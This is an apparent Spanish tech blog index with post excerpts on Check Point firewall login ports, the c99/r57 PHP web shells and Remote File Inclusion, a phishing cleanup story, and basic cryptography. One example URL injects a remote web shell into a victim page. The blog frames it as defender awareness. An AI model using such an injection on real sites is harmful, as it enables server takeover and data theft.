Telepieza´s Weblog

Escribo esté post,  porque tengo una memoria de pez (3 Segundos), y  muchas veces no me acuerdo de los dichosos puertos por defecto,  para poder conectar desde el exterior a una máquina en red,  que tiene enfrente a un firewall Check Point (Internet Security Solutions).

Existen diferentes formas de conectar a un firewall Check Point , una de ellas es por VPN y otra por Cliente autentificado.

El que me interesa es el de Cliente autentificado y los puertos son :

• A nivel de DOS, vía telnet el puerto es el 259. Un ejemplo para activar en Windows es :  telnet 193.142.120.130 259
• A nivel de HTTP, vía Explorer el puerto es el 900. Un Ejemplo es : http://193.142.120.130:900

Cuando tocamos dichos puertos al Firewall nos abre una ventana de color verde (Muy fea), que nos pide Usuario y contraseña.Una vez autentificado nos abre una puerta (IP), vía NAT para poder llegar a una máquina en concreto según la configuración de las reglas del firewall Check Point.

Un Saludo de Telepieza.

Muchas veces el desconocimiento de los informáticos sobre las herramientas utilizadas de  los hacker para entrar en nuestros ordenadores, nos hacen más vulnerables, aquí tenemos el logo del popular programa realizado en phpshell llamado r57shell.php o r57.txt o r57.php

Para solucionar dicha laguna iré explicando una serie de programas cogidos en un ordenador hackeado y a la vez con sus herramientas dejadas en el sistema por cerrar el firewall una vez dentro del servidor linux.

Son muchos los programas a exponer, pero vamos a empezar por dos programas PHPSHELL muy extendidos y son utilizados muy habitualmente por ellos (c99.txt o c99.php y el r57.txt o r57.php). La imagen corresponde al logo del c99.php.

Voy a ejecutar los programas en entorno Windows, pero lo suyo es en Linux, están más pensados en buscar y llevarse la información de vulnerabilidades de servidores con php , por ser dichos programas realizados en lenguaje PHP.

Dichos programas están catalogados en la técnica RFI (Remote File Inclusion) en español (Inclusión de Archivo remoto), se aprovecha de una vulnerabilidad en la programación de páginas web y que tengan instalado el modulo PHP, podemos insertar archivos añadiendo parámetros por la url del navegador. Si la instalación del php.ini está mal configurado, podemos hacer ejecutar nuestros archivos (c99.txt o r57.txt) en el servidor de la website o víctima.

Con un ejemplo se verá más claro:

http://www.victima.com/index.php?page=http://www.tuweb.com/c99.txt en dicho ejemplo renombramos  después a c99.php y ejecutar o http://www.victima.com/index.php?page=http://www.tuweb.com/c99.php? y ejecutas de forma automática.

Al insertar y ejecutar el programa desde nuestro servidor, ellos nos pueden ver todos nuestras carpetas de nuestra página web y analizar los tipos de ficheros y sus autorizaciones de lectura y escritura.

Lee el resto de esta entrada »

Un amigo mío ha recibido un e-mail por vía de su proveedor ISP indicando de su dominio o website está pidiendo datos confidenciales de los clientes de un banco americano. Mi amigo está haciendo phishing en su website.

Los correos electrónicos enviados tanto por el ISP pidiendo ser cerrado el sitio de acceso como el e-mail del propio banco son confidenciales, pero puedo extraer parte del documento cambiando alguna cosilla del e-mail y es :

We have detected a website hosted on your network that purports to be a Bank XXXXXXX website. We confirmed that this webpage is NOT authorized by Bank XXXXXXX and appears to be an unauthorized attempt to obtain our customers’ confidential information. Please send us any server logs or server side scripts that are associated with this fraudulent site. We request that you please assist us in shutting down the website:

URL = http://diminio.com/weblog/template/Boa/data/s.update/u.security/index.html

IP Address – 192.168.1.100

Please forward this message with your response, directly to anti-phishing@bancoenvioemail.com

While the unauthorized site is no longer a threat to our customers after your assistance with shutting it down, we also suggest that you replace your standard ‘shut down’ page with a redirect to our Bank XXXXXXXX

Page using the attached redirect code. By doing this, many ISPs have joined us in educating the public about Phishing and working toward combating the Phishing problem on the internet.

<html> <head>
<meta http-equiv=”REFRESH” content=”0;
URL=https://www.bankXXXXXXXX.com/privacy/Control.XXXXX?body=XXXXXX”>
</head> <body> </body> </html>

If you are unable to replace your shut down page with our redirect, we thank you in advance for taking action to shut down the unauthorized Bank XXXXXXXXX site.

Cómo mi amigo no se dedica a realizar phishing, me pidío ayuda y empece a indagar cómo le habían hackeado su web una pandilla de chorizos. Si investigas cómo actúan puedes saber más del mundo del hacker y de los phishing.

Según la indicación del e-mail del banco se han colocado en su blog y en la zona de template. La pregunta obligada es : ¿Qué distribución tienes de Weblog? La respuesta es : Serendipity y la siguiente pregunta ¿Qué sistema operativo utiliza? y la respuesta es : Linux distribución Red Hat.

Lee el resto de esta entrada »

 La criptografía es el arte de crear criptogramas, es decir, se codifican los mensajes de forma que sólo el emisor y el receptor puedan entenderlos. 

 Vamos a explicar de forma general, cuatro algoritmos de la criptografía (DES, IDEA, RSA y MD5.) son secuencias parcialmente complejas de operaciones que sirven para codificar y decodificar un texto o una cadena binaria.

 Dichos algoritmos de entrada reciben una clave que representa el secreto en sí e influye en el cálculo de los datos codificados. Para poder descodificar dichos mensajes necesitamos la clave utilizada anteriormente.

 Los algoritmos de codificación como el DES (Data Encryption Standars) con 56 bits el espacio para claves es de (7 *10^{16)  ,} en IDEA (International Data Encryption Algorithmus) con 128 bits es de (3,4 * 10^38).

  Los algoritmos (DES e IDEA) son simétricos, eso significa que tanto el codificador y el decodificador utilizan la misma clave. Dicha técnica no es aconsejable para el mundo de internet.

 Si codificamos un texto en un ordenador con dichos algoritmos y lo enviamos por internet a otro ordenador, para que lo pueda descodificar, también tenemos que enviar la clave por la red y eso no es nada aconsejable. Para poder descodificar dichos mensajes el envío de la clave tiene que ser por medios tradicionales, por ejemplo correo ordinario o mensajero.

Lee el resto de esta entrada »

  En la evolución de las tecnologías de la información y las comunicaciones se han cubierto muchas etapas, y actualmente nos encontramos, por diversas circunstancias, en un momento en que la seguridad de la información es una de las mayores preocupaciones de las empresas,  para toda su red asegurando en todo momento el flujo de información entre la compañía, clientes, usuarios, proveedores, acreedores y fabricantes.

  En el afán de seguridad, las empresas invierten muchos millones de euros al año en software, licencias, máquinas y líneas de comunicaciones, para poder dar un servicio y una seguridad en el flujo de información entre nuestras organizaciones sin precedentes en el mundo actual.

  Pero aún teniendo uno de los mejores planes de seguridad, la ciencia no es exacta y los llamados virus, troyanos, espías, escuchadores, spam y gusanos con su evolución de superación informática, vía localizar entradas ocultas en los sistema operativos, nuevas técnicas de programación o una evolución natural del propio software maligno, pueden colarse en nuestros sistemas informáticos y debilitar nuestra red e infectar nuestros ordenadores con la consiguiente pérdida económica para toda nuestra compañía.

Lee el resto de esta entrada »